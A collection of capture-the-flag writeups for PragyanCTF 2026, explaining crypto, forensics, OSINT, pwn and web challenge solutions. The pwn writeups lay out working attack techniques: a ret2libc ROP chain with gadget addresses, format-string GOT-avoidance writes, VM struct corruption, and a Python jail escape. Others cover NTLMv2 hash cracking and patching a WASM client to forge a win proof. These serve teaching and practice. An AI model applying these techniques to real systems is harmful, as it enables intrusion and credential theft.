🇮🇳 PragyanCTF 2026

Writeups for most challenges

crypto

Dor4_Null5

Description

A challenge-response authentication system where users can register and login. Only the "Administrator" user reveals the flag. We don't know the Administrator's secret, but the verification function has a critical weakness.

The server implements:

  1. Registration: Store a username + 64-char password hash

  2. Login: Challenge-response protocol using HKDF-derived keys, AES-ECB path computation, and HMAC-masked verification

Solution

The vulnerability is in verify_credential:

def verify_credential(session_key, expected, provided):
    h = HMAC.new(session_key, expected, SHA256)
    mask = h.digest()[:8]
    checksum = 0
    for i in range(8):
        checksum ^= expected[i] ^ provided[i] ^ mask[i]
    return checksum == 0

Instead of comparing each byte individually, it XORs all comparison results into a single accumulator byte. The check checksum == 0 only verifies:

(expected[0] ^ provided[0] ^ mask[0]) ^ ... ^ (expected[7] ^ provided[7] ^ mask[7]) == 0

This is a single-byte constraint: for any fixed provided, there's a 1/256 chance the checksum is zero regardless of whether we know expected or mask. Since the server allows up to 0x1337 (4919) menu interactions, we can brute-force this with ~256 expected attempts.

Each login attempt uses a fresh random server_token, making navigation_key, expected, and mask effectively random from our perspective. We simply repeat login attempts with a fixed response until the weak XOR check passes by chance.

Succeeds in ~150-300 attempts on average.
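The 1/256 claim is easy to sanity-check offline. A standalone simulation of the weak check with random expected/mask values (this models the server's fresh per-attempt randomness, it is not the remote exploit):

```python
import os

def weak_verify(expected: bytes, provided: bytes, mask: bytes) -> bool:
    # faithful re-implementation of the XOR-accumulator check
    checksum = 0
    for i in range(8):
        checksum ^= expected[i] ^ provided[i] ^ mask[i]
    return checksum == 0

# fixed response, random expected/mask: passes ~1/256 of the time
provided = b'\x00' * 8
TRIALS = 200_000
hits = sum(weak_verify(os.urandom(8), provided, os.urandom(8))
           for _ in range(TRIALS))
rate = hits / TRIALS
```

The observed rate lands near 0.0039, consistent with brute-forcing the login in a few hundred attempts.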

Flag: p_ctf{th15_m4ps-w0n't_l3ads_2_tr34s3ure!}

DumCows

Description

You can connect to a remote service that prints a cow and asks for a name. For any input name, it returns:

  • [Name: <base64>] says: <base64>

Sending FIX_COW <voice> is a special command; with the correct voice it prints a "FLAG SPEAKS" ciphertext.

Solution

Key observation: deterministic keystream reset per connection (multiple backends).

If you open a fresh connection and send a 16+ byte name, the service returns a ciphertext of the same length. For two different 16-byte plaintexts P and P' used as the first name in fresh connections, C ^ P and C' ^ P' are identical (for that backend). This indicates a stream cipher / OTP-style construction:

C = P XOR K

The keystream K is deterministic from the start of the connection. The host is load-balanced: different backends have different K, so you must ensure the two connections you combine are on the same backend (just retry until the decrypted plaintext matches an expected pattern).

Recover the voice.

On the first request in a connection, the server encrypts the name and also encrypts a fixed 18-byte secret in the "says" field.

  • If you send an empty name, the secret is encrypted with the first 18 keystream bytes K[0:18].

  • In another fresh connection, if you send a known 18-byte name P, you can recover K[0:18] = C_name XOR P.

  • Decrypt the secret voice: voice = C_says XOR K[0:18].
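The keystream recovery is plain XOR bookkeeping. A sketch, with c_name and c_says standing for the two ciphertexts captured from same-backend connections:

```python
def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def recover_voice(c_name: bytes, known_name: bytes, c_says: bytes) -> bytes:
    k = xor(c_name, known_name)   # K[0:18] = C_name ^ P
    return xor(c_says, k)         # voice  = C_says ^ K[0:18]
```

The same helper, with 30-byte inputs, recovers the flag in the final step.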

Recover the flag.

With the correct voice, FIX_COW <voice> prints a base64 string that decodes to 30 bytes (this is the ciphertext).

Send FIX_COW <voice> as the very first command in a fresh connection so it uses K[0:30].

In another fresh connection to the same backend, send a 30-byte known name P to recover K[0:30], then:

flag = C_flag XOR K[0:30]

Retry until the result matches the known flag format p_ctf{...}.

!!Cand1esaNdCrypt0!!

Description

A cake ordering server uses RSA signatures over a custom polynomial hash g(x, a, b) = (x³ + ax² + bx) mod P where P is a 128-bit prime. You can sign one "approval" message and must forge a signature on a "transaction" message to get the flag.

Solution

The key insight is that g(x, a, b) = x(x² + ax + b) mod P, so g(0, a, b) = 0 for any a, b. If we craft a transaction suffix such that x ≡ 0 (mod P), then the hash is 0 and the RSA signature of 0 is simply 0 (since 0^d mod n = 0). No signing oracle needed.
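The core algebra can be checked with toy parameters (the tiny RSA pair 3233/2753 is the textbook 61·53 example, used purely for illustration):

```python
# g(0) = 0 for any a, b; any x that is a multiple of P also hashes to 0
P = 2**127 - 1            # Mersenne prime, stands in for the 128-bit prime

def g(x: int, a: int, b: int) -> int:
    return (x**3 + a * x**2 + b * x) % P

n, d = 3233, 2753          # textbook RSA: n = 61 * 53, e = 17
assert g(0, 1234, 5678) == 0
assert g(5 * P, 7, 9) == 0     # x ≡ 0 (mod P) suffices
assert pow(0, d, n) == 0       # the "signature" of hash 0 is just 0
```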

The input x is constructed as bytes_to_long(B || suffix || \x4D) where B = "I authorize the transaction:\n" and suffix is 48 printable ASCII bytes. We need x ≡ 0 (mod P).

Since P is 128-bit (16 bytes) and the suffix is 48 bytes (384 bits), we fix 32 bytes randomly and compute the remaining 16 bytes mod P, retrying until all 16 bytes fall in the printable ASCII range [32, 126]. Each byte is printable with probability 95/256, so an attempt succeeds with probability (95/256)^16 ≈ 1.3 × 10⁻⁷, roughly 1 in 8 million, easily brute-forced.

Flag: p_ctf{3l0w-tH3_c4Ndl35.h4VE=-tHe_CaK3!!}

R0tnoT13

Description

Given a 128-bit internal state S, we receive several diagnostic frames of the form S XOR ROTR(S, k) for rotation offsets k in {2, 4, 8, 16, 32, 64}. A ciphertext encrypted using the state is also provided. Recover S and decrypt the flag.

Solution

The key insight is that all rotation offsets are powers of 2, which means even-indexed bits and odd-indexed bits are never mixed across any frame. This reduces the problem to exactly 2 unknown bits (one for each parity class).

Using the k=2 frame, we express every bit of S in terms of s_0 (for even bits) and s_1 (for odd bits):

  • s_{2i} = s_0 XOR d_0 XOR d_2 XOR ... XOR d_{2i-2} where d_j is bit j of the k=2 frame

  • s_{2i+1} = s_1 XOR d_1 XOR d_3 XOR ... XOR d_{2i-1}

With only 4 candidate states, we brute-force (s_0, s_1), verify each candidate against all 6 frames for consistency, and XOR the valid state with the ciphertext. The combination s_0=1, s_1=0 produces the flag via simple XOR decryption.
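The recovery can be sketched end to end, assuming the convention that bit j of ROTR(S, k) is bit (j+k) mod 128 of S, so each frame satisfies d_j = s_j ^ s_{j+2} for k=2:

```python
W = 128

def rotr(x: int, k: int) -> int:
    return ((x >> k) | (x << (W - k))) & ((1 << W) - 1)

def candidates(frame2: int):
    # d_j = s_j ^ s_{j+2}  =>  s_{j+2} = s_j ^ d_j, seeded by (s_0, s_1)
    d = [(frame2 >> j) & 1 for j in range(W)]
    for s0 in (0, 1):
        for s1 in (0, 1):
            s = [0] * W
            s[0], s[1] = s0, s1
            for j in range(W - 2):
                s[j + 2] = s[j] ^ d[j]
            yield sum(bit << j for j, bit in enumerate(s))

def solve(frames: dict) -> list:
    # frames: {k: S ^ ROTR(S, k)} for k in {2, 4, 8, 16, 32, 64}
    return [c for c in candidates(frames[2])
            if all(c ^ rotr(c, k) == f for k, f in frames.items())]
```

Note that under this convention all four seed combinations survive the frame check (flipping an entire parity class commutes with even rotations), so the ciphertext XOR is what finally picks the right state.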

Flag: p_ctf{l1nyrl34k}


forensics

epstein files

Description

You are provided with a PDF file related to an ongoing investigation. The document appears complete, but not everything is as it seems. Analyze the file carefully and recover the hidden flag. (Flag format: pctf{...})

Solution

The PDF contains 95 pages of Epstein's "black book" contacts. The flag is hidden through a 4-layer chain: a hidden PDF comment, XOR decoding, GPG decryption, and ROT18.

Step 1: Find the hidden PDF comment

A PDF comment (lines starting with % are ignored by renderers) is embedded inside a StructElem dictionary at object 1730 (offset 13554619):

Step 2: Find the XOR key from hidden text on page 94

Page 94 (0-indexed 93) contains two text strings rendered in font F12 with black color (0 0 0 rg), then covered by a near-black rectangle (0.1098 0.1098 0.1098 rg) drawn on top, making them invisible:

  • XOR_KEY at position (422.986, 173.452)

  • JEFFREY at position (422.986, 146.92)

This tells us: the XOR key is "JEFFREY".

Step 3: XOR the hidden hex to get the GPG passphrase

The passphrase is trynottogetdiddled (lowercase).

Step 4: Decrypt the GPG data after %%EOF

109 bytes of OpenPGP encrypted data are appended after the PDF's %%EOF marker. This is a SKESK v4 packet (AES256, SHA512 S2K, 52M iterations) followed by a SEIPD v1 packet.

Step 5: ROT18 decode (ROT13 letters + ROT5 digits)

The decrypted output cpgs{...} has cpgs = ROT13 of pctf, and the digits are ROT5-encoded:
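A decoder sketch for this ROT18 variant (ROT13 on letters, ROT5 on digits, everything else untouched):

```python
def rot18(s: str) -> str:
    out = []
    for ch in s:
        if ch.isalpha():                     # ROT13 on letters
            base = ord('a') if ch.islower() else ord('A')
            out.append(chr((ord(ch) - base + 13) % 26 + base))
        elif ch.isdigit():                   # ROT5 on digits
            out.append(str((int(ch) + 5) % 10))
        else:
            out.append(ch)
    return ''.join(out)
```

Both halves are involutions, so the same function encodes and decodes.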

The flag in leetspeak reads: "AINT NO WAY HE SUICIDE" - a reference to the Epstein conspiracy.

Flag: pctf{41n7_n0_w4y_h3_5u1c1d3}

H@rDl4u6H

Description

A single file smile.bin (6.4 MB) containing multiple steganographic layers, Joker-themed. The flag is hidden through a chain: corrupted WAV with embedded audio stego password, encrypted 7z archive containing a PNG, a GPG-encrypted poem in the archive's trailing bytes, and finally a frequency-domain encoding scheme in the PNG image that must be XOR-decrypted with a key hidden in the image itself.

Solution

Layer 1: Carve WAV + 7z from smile.bin

The file starts with FAKE instead of RIFF. The RIFF size field gives the WAV length (882164 bytes). A 7z archive follows at that offset.
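Carving follows from the RIFF header layout, assuming the standard convention that the chunk-size field at offset 4 covers everything after the first 8 bytes:

```python
import struct

def carve(blob: bytes):
    # total WAV length = RIFF chunk size field + 8 header bytes;
    # everything after it is the appended 7z archive
    riff_size = struct.unpack_from('<I', blob, 4)[0]
    wav_len = riff_size + 8
    return blob[:wav_len], blob[wav_len:]
```

Since the magic was corrupted to FAKE, patch the first 4 bytes back to b'RIFF' before feeding the carved WAV to audio tools.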

Layer 2: Audio LSB steganography

The WAV's ICMT metadata contains base64 encoding of https://github.com/sniperline047/Audio-Steganography-CLI. Using that tool's basic LSB decoder on the WAV extracts the password: transform.

Layer 3: Extract encrypted 7z

The 7z archive is password-protected. Using transform extracts a single file y0uc4n7533m3, a 3000x4500 8-bit grayscale PNG.

Layer 4: GPG-encrypted poem in 7z tail

482 bytes trail after the 7z archive's end. The first 8 bytes are rosetta\n, followed by a PGP symmetrically-encrypted message. Decrypting with password rosetta reveals a poem describing the encoding scheme:

  • 21 concentric rings in the FFT domain, each encoding 8 bits

  • Start at east (0 degrees), walk counter-clockwise in 22.5 degree steps (8 positions)

  • Dark (absence of FFT peak) = 1, Bright (FFT peak present) = 0

  • Second half of each ring mirrors the first half

Layer 5: FFT frequency-domain decoding

The 2D FFT of the PNG shows a starburst pattern with peaks at 21 radii (~100, 169, 238, ..., 1480; spacing ~69 px) and 8 angles (0, 22.5, 45, 67.5, 90, 112.5, 135, 157.5 degrees). Peaks split cleanly into present (log-mag ~13.8) and absent (log-mag ~11.1).

Layer 6: XOR decrypt with key from image

The PNG contains a key written vertically on the left margin, visible after contrast/histogram equalization: prgynxoxo. XOR the 21-byte ciphertext with this repeating key:
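The final step is repeating-key XOR; a sketch using the key and flag from this writeup:

```python
from itertools import cycle

def xor_repeat(data: bytes, key: bytes) -> bytes:
    # XOR each byte against the key, repeating the key as needed
    return bytes(b ^ k for b, k in zip(data, cycle(key)))
```

Applying it twice with the same key is the identity, so the same call encrypts and decrypts.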

Flag: p_ctf{why_50_53r10u5}

Leetspeak for "why so serious", the Joker's iconic line.

$whoami

Description

An internal investigation flagged an anomalous access event involving a restricted internal resource. A packet capture was taken during the suspected time window. The task is to identify the account responsible and the credentials used.

Flag format: p_ctf{username:password}

Solution

Step 1: Protocol analysis

The pcap contains SSH, HTTP, and SMB2 traffic between 10.1.54.28 (client) and 10.1.54.102 (server).

Step 2: Identify the suspicious account

Examining SMB2 sessions reveals multiple user authentications: b.banner, groot, p.parker, hawkeye, and t.stark. Most users only connected to \\10.1.54.102\IPC$, but t.stark was the only account that successfully accessed the restricted share \\10.1.54.102\SecretPlans.

Step 3: Extract password policy and project list from HTTP traffic

The HTTP traffic contained several files served from the internal web server. Two were critical:

  • /policy.txt: SECURITY POLICY: Passwords must be [ProjectName][TimestampOfCreation_Epoch].

  • /notion.so: Listed ongoing projects: SuperHeroCallcentre, Terrabound, OceanMining, Arcadia

Step 4: Extract NTLMv2 authentication data

From t.stark's SMB2 Session Setup (NTLMSSP_AUTH):

  • Username: t.stark

  • Domain: (empty)

  • Server challenge: e3ec06e38823c231

  • NTProofStr: 977bf57592dc13451d54be92d94a095d

  • NTLMv2 blob: (extracted from response)

Step 5: Crack the NTLMv2 hash

Given the password policy [ProjectName][EpochTimestamp], the password is one of the 4 project names concatenated with a Unix epoch timestamp. A Python script implementing NTLMv2 verification was used to brute-force the combination:
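A sketch of the verification chain (the standard NTLMv2 construction: the MD4-based NT hash is passed in as a callable, since in practice it comes from e.g. pycryptodome's MD4, whose availability in hashlib varies):

```python
import hashlib
import hmac

def ntproof(nt_hash: bytes, user: str, domain: str,
            server_challenge: bytes, blob: bytes) -> bytes:
    # NTLMv2 key = HMAC-MD5(NT hash, UTF-16LE(upper(user) + domain))
    k = hmac.new(nt_hash, (user.upper() + domain).encode('utf-16-le'),
                 hashlib.md5).digest()
    # NTProofStr = HMAC-MD5(NTLMv2 key, server_challenge || blob)
    return hmac.new(k, server_challenge + blob, hashlib.md5).digest()

def crack(target_proof, nt_hash_fn, user, domain, challenge, blob,
          projects, epochs):
    # brute-force [ProjectName][EpochTimestamp] per the leaked policy
    for name in projects:
        for t in epochs:
            pw = f'{name}{t}'
            if ntproof(nt_hash_fn(pw), user, domain,
                       challenge, blob) == target_proof:
                return pw
```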

The cracking revealed: password = Arcadia1451606400 (project "Arcadia" + epoch for Jan 1, 2016 00:00:00 UTC).

Flag: p_ctf{t.stark:Arcadia1451606400}

Plumbing

Description

We found a Docker image that was already built and shipped. Something sensitive might have slipped through during build time, but the final container looks clean?? Analyze the image and recover what was lost.

Flag format: p_ctf{...}

Attachment: app.tar (OCI Docker image)

Solution

The challenge provides a Docker image exported as app.tar. The key insight is that Docker images store the full build history, including all commands from the Dockerfile, in the image config JSON. Even if files are deleted in later layers, the build commands remain visible.

Step 1: Extract and inspect the image config
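Assuming the docker-save layout (a top-level manifest.json naming the config JSON), the extraction can be sketched as:

```python
import json
import tarfile

def image_history(path=None, fileobj=None):
    # manifest.json points at the config JSON, whose "history" array
    # preserves every build command, even for layers whose files were
    # later deleted
    with tarfile.open(name=path, fileobj=fileobj) as tf:
        manifest = json.load(tf.extractfile('manifest.json'))
        config = json.load(tf.extractfile(manifest[0]['Config']))
    return [h.get('created_by', '') for h in config.get('history', [])]
```

Grepping the returned list for RUN lines surfaces the leaked flag immediately.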

Step 2: Read the build history

The image config contains the full Dockerfile history. The critical entries are:

The flag p_ctf{d0ck3r_l34k5_p1p3l1n35} is leaked directly in the RUN command visible in the image history. Despite the cleanup steps (deleting intermediate files, overwriting output, replacing the script), the Dockerfile build commands are permanently recorded in the image config.

Additional forensic artifacts available in intermediate layers:

By inspecting earlier layers, one can also recover:

  • process.py: A toy block cipher using XOR and permutation with 10 rounds

  • .env: Contains AES_KEY=THIS_IS_AES_KEY!

  • state_round7.bin: Debug dump of encryption state at round 7

  • output.bin: Encrypted second block of the input

But none of these are needed since the flag is directly visible in the build history.

Flag: p_ctf{d0ck3r_l34k5_p1p3l1n35}

c47chm31fy0uc4n

Description

We are given a Linux memory dump (attachments/memdump.fin) from shortly after an incident. We must recover, from memory only:

  • The session key exfiltrated by a malicious userspace process

  • The epoch timestamp used during exfiltration

  • The destination IP used for exfiltration

  • The attacker's ephemeral source port during remote (SSH) access

Flag format:

p_ctf{<session_key>:<epoch>:<exfiltration_ip>:<ephemeral_remote_execution_port>}

Solution

This solve can be done with simple string carving; no kernel symbols needed.
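The carving itself can be sketched as a regex scan over the raw dump (the SYNC record format is inferred from the recovered line below):

```python
import re

SYNC_RE = re.compile(
    rb'SYNC (FLAG\{[^}]+\}) (\d{10}) (\d{1,3}(?:\.\d{1,3}){3})')

def carve_sync_records(dump: bytes):
    # returns (flag, epoch, ip) tuples for every SYNC record in memory
    return [tuple(x.decode() for x in m.groups())
            for m in SYNC_RE.finditer(dump)]
```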

  1. Extract the exfiltration record (session key, epoch, destination IP)

This reveals the exfiltration line:

SYNC FLAG{heap_and_rwx_never_lie} 1769853900 10.13.37.7

So:

  • session_key = heap_and_rwx_never_lie (the value inside FLAG{...})

  • epoch = 1769853900

  • exfiltration_ip = 10.13.37.7

You can confirm the process kept the key in its environment:

  2. Identify the attacker's SSH ephemeral source port

First, list the SSH login artifacts present in memory:

Multiple SSH source ports appear, so we correlate the malicious execution context (msg_sync) to the SSH session environment block.

In that context, the SSH environment variables show:

  • SSH_CLIENT=192.168.153.1 57540 22

  • SSH_CONNECTION=192.168.153.1 57540 192.168.153.130 22

  • SSH_TTY=/dev/pts/0

Therefore the attacker session's ephemeral source port is 57540.

  3. Assemble the final flag


misc

Lost in the Haze

Description

A geolocation/OSINT challenge providing a Google Street View image (whereami.png) of a Japanese urban street. The challenge title is "Lost in the Haze" with the description: "I remember stepping outside for a moment. The air felt heavy, the lights too bright, the streets unfamiliar. All I know is that this location has a name."

Flag format: p_ctf{ward_name}

Solution

The key clue is in the challenge title: "Lost in the Haze."

The word "haze" translates to kasumi (霞) in Japanese. The most famous location in Japan with "kasumi" in its name is Kasumigaseki (霞ヶ関), literally meaning "Gate of Mist/Haze." Kasumigaseki is located in Chiyoda ward (千代田区), Tokyo, and is well known as Japan's government district.

The image confirms a Japanese urban setting via Google Street View, showing narrow streets with a distinctive granite stone wall, vending machines, and dense residential/commercial buildings typical of central Tokyo.

Combining the linguistic hint with the visual confirmation:

  • "Haze" → kasumi (霞) → Kasumigaseki (霞ヶ関) → Chiyoda ward

Flag: p_ctf{chiyoda}

Tac Tic Toe

Description

A web-based tic-tac-toe game at https://tac-tic-toe.ctf.prgy.in where you play against an AI. The game logic runs in a Go-compiled WebAssembly module (main.wasm). The AI uses minimax, making it unbeatable through normal play. Winning the game triggers a /win endpoint that returns the flag, but it requires a valid cryptographic proof generated by the WASM.

Solution

The game flow:

  1. GET /start returns a session_id and proof_seed

  2. The WASM initializes with the seed, and each move (player + AI) updates a rolling proof via UpdateProof() using custom mixing functions (proofMixA/B/C/D)

  3. On win, GetWinData() returns the move sequence and proof, which is submitted to POST /win for server-side verification

The server validates the proof against the seed and moves but does not enforce that the AI played optimally -- it only replays the moves and checks the proof matches. This means if we patch the WASM to make the AI play poorly, the proof will still be valid because UpdateProof depends only on move positions and the seed, not on how the AI chose its move.

Steps:

  1. Download main.wasm and convert to WAT text format using wasm2wat

  2. Locate the main.playPerfectMove function which selects the AI's best move via minimax

  3. Patch two values:

    • Change initial bestScore from -1000 to 1000 (so the AI starts looking for the minimum score)

    • Change the comparison i64.lt_s to i64.gt_s (so the AI picks the worst move instead of the best)

  4. Convert back to WASM with wat2wasm

  5. Run the patched WASM in Node.js with the server's proof_seed, play winning moves, and submit the resulting proof
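The textual patch in steps 2-3 can be sketched as a pair of string rewrites over the WAT dump (shown globally for brevity; in practice you would scope the replacements to the main.playPerfectMove function body):

```python
def patch_wat(wat: str) -> str:
    # invert minimax: seed the search with +1000 and keep moves that
    # *lower* the score, so the AI deliberately plays its worst move
    patched = wat.replace('i64.const -1000', 'i64.const 1000')
    patched = patched.replace('i64.lt_s', 'i64.gt_s')
    return patched
```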

The patched AI places its marks in the worst positions. Playing moves [0, 3, 6] (left column) wins in 3 turns:

  • Player -> 0, AI -> 1

  • Player -> 3, AI -> 2

  • Player -> 6 (win: left column)

The WASM patching was done with:

Flag: p_ctf{W@sM@_!s_Fas&t_Bu?_$ecur!ty}


pwn

pCalc

Description

A "super secure calculator" Python jail. The server evaluates user input through eval() with restricted builtins ({"__builtins__": {}}) and an AST validator that only allows math-related nodes (BinOp, UnaryOp, Constant, Name, operator, unaryop) plus JoinedStr (f-strings). An audit hook blocks os.system, os.popen, subprocess.Popen, and opening files with "flag" in the name. The string "import" is also blocked in the raw input.

Solution

Three vulnerabilities chained together:

  1. F-string AST bypass: The AST validator allows JoinedStr (f-string) nodes but simply executes pass instead of recursing into their children. This means arbitrary Python expressions inside f"{...}" are never validated.

  2. Object hierarchy for builtins: Since __builtins__ is empty in the eval context, we walk Python's object hierarchy ().__class__.__mro__[1].__subclasses__() to find a class with a Python __init__ function, then access __init__.__globals__['__builtins__'] to recover the full builtins dict.

  3. Bytes path audit bypass: The audit hook checks isinstance(args[0], str) and 'flag' in args[0]. Passing the filename as bytes (b'flag.txt') makes isinstance(args[0], str) return False, bypassing the check entirely.
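The object-walk from step 2 can be reproduced in a plain interpreter (a sketch; which subclass ends up providing a Python-level __init__ varies by Python version and imported modules):

```python
def recover_builtins():
    # walk object's subclasses looking for one with a Python-level
    # __init__, whose __globals__ carries the real builtins mapping
    for cls in ().__class__.__mro__[1].__subclasses__():
        init = getattr(cls, '__init__', None)
        glb = getattr(init, '__globals__', None)
        if glb and '__builtins__' in glb:
            return glb['__builtins__']
```

In the jail the same expression is smuggled inside an f-string so the validator never sees it.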

The "import" filter is bypassed with string concatenation ('__imp'+'ort__'), though it's not even needed for the file read payload.

Flag: p_ctf{CHA7C4LCisJUst$HorTf0rcaLCUla70r}

Dirty Laundry

Description

The washing machine doesn't seem to work. Could you take a look?

Binary with libc 2.35 provided. Connect via ncat --ssl dirty-laundry.ctf.prgy.in 1337.

Solution

Classic ret2libc buffer overflow. The vuln() function allocates a 0x40 (64) byte buffer but reads 0x100 (256) bytes via read(), giving a clean stack overflow with no canary and no PIE.

Binary protections: Partial RELRO, No canary, NX enabled, No PIE.

Strategy: Two-stage ROP chain:

  1. Stage 1, leak libc: Overflow to call puts(GOT.puts), which prints the resolved libc address of puts, then return to vuln for a second input. A ret gadget is inserted before the return to vuln to fix 16-byte stack alignment (since ret-to-function differs from call).

  2. Stage 2, shell: Calculate the libc base from the leak, then overflow again to call system("/bin/sh").

Key gadgets from the binary (no PIE, so addresses are fixed):

  • pop rdi; pop r14; ret at 0x4011a7

  • ret at 0x40101a
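The stage-1 chain can be sketched as a payload builder (gadget addresses are the fixed ones above; the GOT/PLT/vuln addresses passed in the test are placeholders, and the 72-byte pad assumes the usual 0x40 buffer + 8 bytes of saved rbp):

```python
import struct

def p64(v: int) -> bytes:
    return struct.pack('<Q', v)

POP_RDI_POP_R14_RET = 0x4011a7   # fixed: binary has no PIE
RET = 0x40101a                   # lone ret, realigns the stack

def stage1(got_puts: int, plt_puts: int, vuln_addr: int,
           pad: int = 72) -> bytes:
    chain = [
        POP_RDI_POP_R14_RET, got_puts, 0,   # rdi = &GOT[puts], r14 = junk
        plt_puts,                           # puts(GOT.puts) leaks libc
        RET,                                # 16-byte alignment fix
        vuln_addr,                          # back to vuln for stage 2
    ]
    return b'A' * pad + b''.join(p64(q) for q in chain)
```

Stage 2 reuses the same layout with system("/bin/sh") in place of the leak.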

Flag: p_ctf{14UnDryHASbEenSUCces$fU11YCOMP1e73d}

Talking Mirror

Description

A 64-bit ELF reads a line with fgets(buf, 0x64, stdin) and then calls printf(buf) followed by exit(0). The goal is to print flag.txt via the provided win() function.

Solution

The bug is a classic format-string vulnerability (printf(buf)) with NX enabled. The obvious exploit is to overwrite exit@GOT with win, but every .got.plt address is 0x400a** and therefore contains a 0x0a byte; fgets() stops at newline, so you cannot place any .got.plt pointer directly in the input.

Key observation: the first PT_LOAD segment is RW and contains .dynsym and .rela.plt at fixed addresses (no PIE), and those addresses do not contain 0x0a. We can avoid writing to .got.plt entirely by redirecting lazy binding:

  • exit@plt triggers the dynamic linker (_dl_fixup) using the exit relocation entry in .rela.plt.

  • That relocation's r_info encodes the symbol index. For exit, the symbol index is 10.

  • If we change the symbol index to 11 (stdout) in that relocation, the exit@plt call will resolve the symbol stdout instead of exit.

  • stdout (dynsym index 11) is one of the few symbols actually present in the executable's .gnu.hash (symoffset=11), so _dl_lookup_symbol_x will find the executable's stdout definition.

  • Patch dynsym[11].st_value to the address of win (0x401216). Now "resolving stdout" returns win.

  • When vuln() calls exit(0), the resolver jumps to win(), which prints the flag and _exit(0)s.

Concrete writes (all to the RW first segment):

  • .rela.plt exit entry is at 0x400638 + 7*24 = 0x4006e0.

    • r_info is at 0x4006e8.

    • The symbol index (high 32 bits) is stored at 0x4006ec; write 0x0b to make it symbol 11.

  • .dynsym base is 0x4003d8, entry size 24.

    • dynsym[11] starts at 0x4003d8 + 11*24 = 0x4004e0.

    • st_value is at 0x4004e8; write 0x401216 (done as two %hn writes: 0x0040 at 0x4004ea and 0x1216 at 0x4004e8).
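The three 2-byte writes can be planned with a pwntools-style %hn builder (a sketch; arg_offset is the printf argument index of our buffer's first qword, found by probing with %p, and glibc tolerates mixing width-padded %c with positional %hn):

```python
import struct

def p64(v: int) -> bytes:
    return struct.pack('<Q', v)

WRITES = {                 # addresses/values from the analysis above
    0x4006ec: 0x000b,      # .rela.plt exit entry: symbol index -> 11
    0x4004e8: 0x1216,      # dynsym[11].st_value, low 16 bits of win
    0x4004ea: 0x0040,      # dynsym[11].st_value, bits 16..31 of win
}

def build_payload(writes, arg_offset, fmt_len=64):
    # pad the format part to fmt_len so the appended addresses land at
    # a known argument index; write targets in increasing value order
    order = sorted(writes.items(), key=lambda kv: kv[1])
    addr_arg = arg_offset + fmt_len // 8
    fmt, printed = b'', 0
    for i, (_, val) in enumerate(order):
        delta = (val - printed) % 0x10000
        if delta:
            fmt += b'%%%dc' % delta          # pad output up to target
        fmt += b'%%%d$hn' % (addr_arg + i)   # 2-byte write
        printed = val
    assert len(fmt) <= fmt_len
    return fmt.ljust(fmt_len, b'A') + b''.join(p64(a) for a, _ in order)
```

None of the target addresses contain 0x0a, and the whole payload fits under the 0x64-byte fgets limit only if fmt_len is tuned; the layout above is illustrative.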

Exploit code (single shot):

TerViMator

Description

Skynet is rising. Can you defeat this early version of the T-1000s mainframe before it becomes unstoppable?

ncat --ssl tervimator.ctf.prgy.in 1337

A stripped PIE binary (Full RELRO, NX, no canary) implementing a custom bytecode VM. Binary protections:

  • PIE enabled (randomized base)

  • Full RELRO (GOT not writable)

  • NX enabled (no shellcode)

  • No stack canary

Solution

Reverse Engineering the VM:

The binary reads up to 0x1000 bytes of bytecode, then executes a custom VM with 16 32-bit registers, 7 opcodes, and 9 syscalls.

Opcodes (0-6):

Opcode | Name    | Format       | Description
------ | ------- | ------------ | -----------
0      | HALT    | 00           | Stop execution
1      | LOADI   | 01 reg imm32 | regs[reg] = imm32
2      | MOV     | 02 dst src   | regs[dst] = regs[src]
3      | ADD     | 03 dst src   | regs[dst] += regs[src]
4      | SUB     | 04 dst src   | regs[dst] -= regs[src]
5      | XOR     | 05 dst src   | regs[dst] ^= regs[src]
6      | SYSCALL | 06           | Dispatch on regs[0]

Syscalls (regs[0] = 1-9):

ID | Name       | Args                   | Description
-- | ---------- | ---------------------- | -----------
1  | alloc_data | size=r1                | Allocate data object (perm=rw, type=1)
2  | alloc_exec | task=r1                | Allocate exec object (perm=x, type=2), stores func_ptr ^ KEY
3  | gc         | -                      | Free objects with refcount=0
4  | split      | obj=r1                 | refcount += 2
5  | name       | obj=r1, len=r2         | Read len bytes from stdin into &objects[obj] (max 0x40)
6  | write_byte | obj=r1, off=r2, val=r3 | Write byte at &obj + 0x10 + off (requires perm & 2)
7  | inspect    | obj=r1, off=r2         | Print byte at &obj + 0x10 + off (requires perm & 1)
8  | execute    | obj=r1                 | Decode ptr ^ KEY and call it (requires perm & 4, type=2)
9  | dup        | obj=r1                 | refcount += 1

Object struct (24 bytes each, 16 max, at BSS offset 0x5040):

Win function at offset 0x129d: calls puts("CRITICAL: PRIVILEGE ESCALATION.") then system("/bin/sh").

Vulnerabilities:

  1. No bounds check on inspect/write_byte offset - The inspect and write_byte syscalls access &objects[obj] + 0x10 + offset with no bounds validation on offset, allowing read/write into adjacent object structs.

  2. Name syscall overwrites object struct - The name syscall writes raw bytes starting at &objects[obj] (the struct base), not the heap buffer. With len up to 0x40 (64 bytes), this overflows into subsequent objects' structs (each 24 bytes).

Exploit Strategy:

  1. Allocate data object 0 (type=1, perm=rw) and exec object 1 (type=2, perm=x)

  2. Use inspect(obj=0, offset=24..31) to read object 1's XOR-encoded function pointer through the out-of-bounds read (no bounds check on offset)

  3. Decode the leak: alloc_data_addr = stored ^ KEY, compute win_addr = alloc_data_addr - 0x141

  4. Use name(obj=0, len=48) to overwrite both objects' structs from stdin, setting object 1's pointer to win_addr ^ KEY

  5. execute(obj=1) decodes the pointer and calls the win function
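Assuming the opcode and syscall encodings from the tables above, the leak phase of the bytecode can be assembled like this:

```python
import struct

def loadi(reg: int, imm: int) -> bytes:   # opcode 1: regs[reg] = imm32
    return bytes([1, reg]) + struct.pack('<I', imm)

SYSCALL = b'\x06'   # opcode 6: dispatch on regs[0]
HALT = b'\x00'

prog  = loadi(0, 1) + loadi(1, 0x10) + SYSCALL   # alloc_data(0x10) -> obj 0
prog += loadi(0, 2) + loadi(1, 0)    + SYSCALL   # alloc_exec(0)    -> obj 1
for off in range(24, 32):
    # inspect(obj=0, off): offsets 24..31 walk into object 1's 24-byte
    # struct, leaking the XOR-encoded function pointer byte by byte
    prog += loadi(0, 7) + loadi(1, 0) + loadi(2, off) + SYSCALL
prog += HALT
```

The second stage reuses the same helpers to drive the name-syscall overwrite and the final execute.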

Flag: p_ctf{tErVIm4TOrT-1000ha$BE3nd3feaT3D}


web

Server OC

Description

Overclocking increases FPS, but for a SysAd, does it increase...Requests Per Second?

